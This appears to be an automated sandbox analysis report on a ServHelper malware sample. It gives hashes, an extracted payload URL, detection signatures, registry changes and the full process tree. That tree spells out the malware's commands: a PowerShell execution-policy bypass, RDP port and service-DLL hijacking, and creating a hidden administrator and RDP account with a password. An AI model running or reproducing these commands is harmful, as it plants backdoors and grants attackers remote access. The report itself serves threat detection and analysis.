Analysis
-
max time kernel
121s -
max time network
120s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
26-10-2021 14:49
Static task
static1
Behavioral task
behavioral1
Sample
63151e4f7c3972f18a23c0e9996e14ef.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
63151e4f7c3972f18a23c0e9996e14ef.exe
Resource
win10-en-20211014
General
-
Target
63151e4f7c3972f18a23c0e9996e14ef.exe
-
Size
5.7MB
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
-
SHA1
5d041fde6433a8ff8fc78a69fca1fd4630e3f270
-
SHA256
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
-
SHA512
f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid Process 29 1344 powershell.exe 31 1344 powershell.exe 32 1344 powershell.exe 33 1344 powershell.exe 35 1344 powershell.exe 37 1344 powershell.exe 39 1344 powershell.exe 41 1344 powershell.exe 43 1344 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/files/0x000500000001ab95-354.dat upx behavioral2/files/0x000500000001ab96-355.dat upx -
Loads dropped DLL 2 IoCs
Processes:
pid Process 2164 2164 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44E8.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_a2qio3mq.jst.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dl3j2yvx.o05.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44A8.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4419.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4478.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44F8.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 1344 powershell.exe 1344 powershell.exe 1344 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeIncreaseQuotaPrivilege 4032 powershell.exe Token: SeSecurityPrivilege 4032 powershell.exe Token: SeTakeOwnershipPrivilege 4032 powershell.exe Token: SeLoadDriverPrivilege 4032 powershell.exe Token: SeSystemProfilePrivilege 4032 powershell.exe Token: SeSystemtimePrivilege 4032 powershell.exe Token: SeProfSingleProcessPrivilege 4032 powershell.exe Token: SeIncBasePriorityPrivilege 4032 powershell.exe Token: SeCreatePagefilePrivilege 4032 powershell.exe Token: SeBackupPrivilege 4032 powershell.exe Token: SeRestorePrivilege 4032 powershell.exe Token: SeShutdownPrivilege 4032 powershell.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeSystemEnvironmentPrivilege 4032 powershell.exe Token: SeRemoteShutdownPrivilege 4032 powershell.exe Token: SeUndockPrivilege 4032 powershell.exe Token: SeManageVolumePrivilege 4032 powershell.exe Token: 33 4032 powershell.exe Token: 34 4032 powershell.exe Token: 35 4032 powershell.exe Token: 36 4032 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeIncreaseQuotaPrivilege 2092 powershell.exe Token: SeSecurityPrivilege 2092 powershell.exe Token: SeTakeOwnershipPrivilege 2092 powershell.exe Token: SeLoadDriverPrivilege 2092 powershell.exe Token: SeSystemProfilePrivilege 2092 powershell.exe Token: SeSystemtimePrivilege 2092 powershell.exe Token: SeProfSingleProcessPrivilege 2092 powershell.exe Token: SeIncBasePriorityPrivilege 2092 powershell.exe Token: SeCreatePagefilePrivilege 2092 powershell.exe Token: SeBackupPrivilege 2092 powershell.exe Token: SeRestorePrivilege 2092 powershell.exe Token: SeShutdownPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeSystemEnvironmentPrivilege 2092 powershell.exe Token: SeRemoteShutdownPrivilege 2092 powershell.exe Token: SeUndockPrivilege 2092 powershell.exe Token: SeManageVolumePrivilege 2092 powershell.exe Token: 33 2092 powershell.exe Token: 34 2092 powershell.exe Token: 35 2092 powershell.exe Token: 36 2092 powershell.exe Token: SeDebugPrivilege 3320 powershell.exe Token: SeIncreaseQuotaPrivilege 3320 powershell.exe Token: SeSecurityPrivilege 3320 powershell.exe Token: SeTakeOwnershipPrivilege 3320 powershell.exe Token: SeLoadDriverPrivilege 3320 powershell.exe Token: SeSystemProfilePrivilege 3320 powershell.exe Token: SeSystemtimePrivilege 3320 powershell.exe Token: SeProfSingleProcessPrivilege 3320 powershell.exe Token: SeIncBasePriorityPrivilege 3320 powershell.exe Token: SeCreatePagefilePrivilege 3320 powershell.exe Token: SeBackupPrivilege 3320 powershell.exe Token: SeRestorePrivilege 3320 powershell.exe Token: SeShutdownPrivilege 3320 powershell.exe Token: SeDebugPrivilege 3320 powershell.exe Token: SeSystemEnvironmentPrivilege 3320 powershell.exe Token: SeRemoteShutdownPrivilege 3320 powershell.exe Token: SeUndockPrivilege 3320 powershell.exe Token: SeManageVolumePrivilege 3320 powershell.exe Token: 33 3320 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
63151e4f7c3972f18a23c0e9996e14ef.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid Process procid_target PID 2896 wrote to memory of 2188 2896 63151e4f7c3972f18a23c0e9996e14ef.exe 70 PID 2896 wrote to memory of 2188 2896 63151e4f7c3972f18a23c0e9996e14ef.exe 70 PID 2188 wrote to memory of 2808 2188 powershell.exe 72 PID 2188 wrote to memory of 2808 2188 powershell.exe 72 PID 2808 wrote to memory of 3436 2808 csc.exe 73 PID 2808 wrote to memory of 3436 2808 csc.exe 73 PID 2188 wrote to memory of 4032 2188 powershell.exe 74 PID 2188 wrote to memory of 4032 2188 powershell.exe 74 PID 2188 wrote to memory of 2092 2188 powershell.exe 77 PID 2188 wrote to memory of 2092 2188 powershell.exe 77 PID 2188 wrote to memory of 3320 2188 powershell.exe 79 PID 2188 wrote to memory of 3320 2188 powershell.exe 79 PID 2188 wrote to memory of 1828 2188 powershell.exe 81 PID 2188 wrote to memory of 1828 2188 powershell.exe 81 PID 2188 wrote to memory of 1864 2188 powershell.exe 82 PID 2188 wrote to memory of 1864 2188 powershell.exe 82 PID 2188 wrote to memory of 2020 2188 powershell.exe 83 PID 2188 wrote to memory of 2020 2188 powershell.exe 83 PID 2188 wrote to memory of 1364 2188 powershell.exe 84 PID 2188 wrote to memory of 1364 2188 powershell.exe 84 PID 1364 wrote to memory of 3960 1364 net.exe 85 PID 1364 wrote to memory of 3960 1364 net.exe 85 PID 2188 wrote to memory of 3568 2188 powershell.exe 86 PID 2188 wrote to memory of 3568 2188 powershell.exe 86 PID 3568 wrote to memory of 3056 3568 cmd.exe 87 PID 3568 wrote to memory of 3056 3568 cmd.exe 87 PID 3056 wrote to memory of 1564 3056 cmd.exe 88 PID 3056 wrote to memory of 1564 3056 cmd.exe 88 PID 1564 wrote to memory of 3764 1564 net.exe 89 PID 1564 wrote to memory of 3764 1564 net.exe 89 PID 2188 wrote to memory of 3748 2188 powershell.exe 90 PID 2188 wrote to memory of 3748 2188 powershell.exe 90 PID 3748 wrote to memory of 888 3748 cmd.exe 91 PID 3748 wrote to memory of 888 3748 cmd.exe 91 PID 888 wrote to memory of 3724 888 cmd.exe 92 PID 888 wrote to memory of 3724 888 cmd.exe 92 PID 3724 wrote to memory of 1528 3724 net.exe 93 PID 3724 wrote to memory of 1528 3724 net.exe 93 PID 1948 wrote to memory of 3068 1948 cmd.exe 97 PID 1948 wrote to memory of 3068 1948 cmd.exe 97 PID 3068 wrote to memory of 2216 3068 net.exe 98 PID 3068 wrote to memory of 2216 3068 net.exe 98 PID 664 wrote to memory of 3436 664 cmd.exe 101 PID 664 wrote to memory of 3436 664 cmd.exe 101 PID 3436 wrote to memory of 3032 3436 net.exe 102 PID 3436 wrote to memory of 3032 3436 net.exe 102 PID 356 wrote to memory of 3324 356 cmd.exe 105 PID 356 wrote to memory of 3324 356 cmd.exe 105 PID 3324 wrote to memory of 632 3324 net.exe 106 PID 3324 wrote to memory of 632 3324 net.exe 106 PID 772 wrote to memory of 3444 772 cmd.exe 109 PID 772 wrote to memory of 3444 772 cmd.exe 109 PID 3444 wrote to memory of 1456 3444 net.exe 110 PID 3444 wrote to memory of 1456 3444 net.exe 110 PID 1164 wrote to memory of 3580 1164 cmd.exe 113 PID 1164 wrote to memory of 3580 1164 cmd.exe 113 PID 3580 wrote to memory of 3720 3580 net.exe 114 PID 3580 wrote to memory of 3720 3580 net.exe 114 PID 1760 wrote to memory of 2604 1760 cmd.exe 117 PID 1760 wrote to memory of 2604 1760 cmd.exe 117 PID 2604 wrote to memory of 1092 2604 net.exe 118 PID 2604 wrote to memory of 1092 2604 net.exe 118 PID 2304 wrote to memory of 2920 2304 cmd.exe 121 PID 2304 wrote to memory of 2920 2304 cmd.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\63151e4f7c3972f18a23c0e9996e14ef.exe"C:\Users\Admin\AppData\Local\Temp\63151e4f7c3972f18a23c0e9996e14ef.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sofo34bb\sofo34bb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE938.tmp" "c:\Users\Admin\AppData\Local\Temp\sofo34bb\CSC994BD6EF4CB9446894FBBA752418CC13.TMP"4⤵PID:3436
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1828
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1864
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2020
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3764
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1528
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:496
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2216
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc V0rGJELN /add1⤵
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc V0rGJELN /add2⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc V0rGJELN /add3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:632
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵PID:1456
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc V0rGJELN1⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc V0rGJELN2⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc V0rGJELN3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:2920
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2020
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:1364
-
-
